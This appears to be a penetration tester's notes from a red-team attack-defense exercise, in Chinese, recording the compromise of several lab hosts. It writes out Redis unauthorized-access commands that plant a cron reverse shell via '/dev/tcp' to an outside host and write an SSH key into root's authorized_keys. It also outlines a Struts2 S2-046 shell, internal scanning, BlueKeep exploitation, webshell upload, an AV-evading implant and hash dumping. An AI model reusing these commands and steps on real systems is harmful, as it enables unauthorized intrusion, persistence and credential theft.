三月攻防演练
192.168.1.96
redis未授权,远程redis连接上后尝试定时任务反弹shell(此处使用自动化工具ips会有拦截,但是手工不会,可能需要添加规则):
set x "\n* * * * * bash -i >& /dev/tcp/xx.xx.xx.xx/12345 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
失败,后尝试直接写秘钥然后ssh登录:
ssh-keygen -t rsa //生成秘钥
config set /root/.ssh
config set dbfilename authorized_keys
set x "\n\n\n公钥\n\n\n"
save
本地ssh登录:
192.168.1.94
挂96的代理,无需绕wafs2-046直接写shell到192.168.1.94:2002
内网资产识别:
上传netspy、dismap、serverscan到192.168.1.96上直接对内网进行扫描(此处会发现),收集到资产存活的网段:
2023/03/29 11:02 192.168.1.1/24
2023/03/29 11:02 192.168.0.1/24
2023/03/29 11:02 192.168.16.1/24
2023/03/29 11:02 192.168.32.1/24
2023/03/29 11:02 192.168.48.1/24
2023/03/29 11:02 192.168.64.1/24
2023/03/29 11:02 192.168.80.1/24
2023/03/29 11:02 192.168.10.2/24
2023/03/29 11:02 192.168.3.2/24
2023/03/29 11:02 192.168.4.2/24
2023/03/29 11:02 192.168.96.1/24
2023/03/29 11:02 192.168.112.1/24
2023/03/29 11:02 192.168.122.1/24
2023/03/29 11:02 192.168.128.1/24
2023/03/29 11:02 192.168.144.1/24
2023/03/29 11:02 192.168.160.1/24
2023/03/29 11:02 192.168.176.1/24
2023/03/29 11:02 192.168.192.1/24
2023/03/29 11:02 192.168.208.1/24
2023/03/29 11:02 192.168.224.1/24
2023/03/29 11:02 192.168.240.1/24
2023/03/29 11:02 172.16.1.1/24
2023/03/29 11:02 172.16.2.1/24
2023/03/29 11:02 172.16.3.1/24
对所有网段存活主机进行探测,后发现192.168.3.40以及192.168.3.64可能存在ms17-010,探测后发现不存在,后尝试0708
192.168.3.40
CVE-2019-0708直接拿下(可能我脸黑,打了得有三四十次才下来,其他红队的小伙伴说是两三次就能下来一次,至于为什么打了几十次我还在打因为识别发现确认了有洞打不下来就是人品问题)
192.168.3.64
同192.168.3.40
192.168.4.81
挂192.168.3.64的代理,直接即可绕过waf防护,通过任意用户登录拿到cookie后直接写webshell,本主机在域内拿下权限后本地制作UES的免杀马上线UES后直接抓密码,只抓到了hash,未解开,未尝试横向移动,时间就已到了
还有两个额外的主机不是靶场内部的就不记了